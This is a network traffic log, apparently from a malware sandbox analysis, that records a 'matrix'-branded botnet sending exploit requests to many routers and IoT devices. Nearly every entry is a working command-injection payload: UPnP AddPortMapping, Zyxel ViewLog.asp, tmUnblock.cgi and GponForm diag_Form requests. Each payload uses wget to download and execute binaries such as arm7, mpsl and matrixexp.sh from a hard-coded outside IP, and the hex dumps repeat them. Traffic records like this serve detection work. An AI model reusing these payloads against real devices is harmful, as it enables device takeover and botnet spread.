                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:22:47.724253893 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:14.353667021 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        428192.168.2.1360322178.198.145.12380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.263000011 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:23.440562963 CET347INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 138
                                                        Location: http://127.0.0.1/
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=20
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:22:23.441869974 CET295INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        429192.168.2.1334762172.67.183.2538080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.353312016 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        430192.168.2.1334554172.65.31.2448080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.353419065 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        431192.168.2.13596985.141.35.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526213884 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        432192.168.2.1353450212.98.112.53443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526257038 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        433192.168.2.1340150109.107.198.14443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526257038 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        434192.168.2.1333924118.4.151.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526284933 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        435192.168.2.1345740118.214.225.243443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526285887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        436192.168.2.1348922118.113.230.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526308060 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        437192.168.2.13546745.48.237.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526436090 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        438192.168.2.1334320118.6.15.186443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526463032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        439192.168.2.1357460118.19.172.156443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:23.526469946 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        440192.168.2.133688042.91.215.189443
                                                        TimestampBytes transferredDirectionData
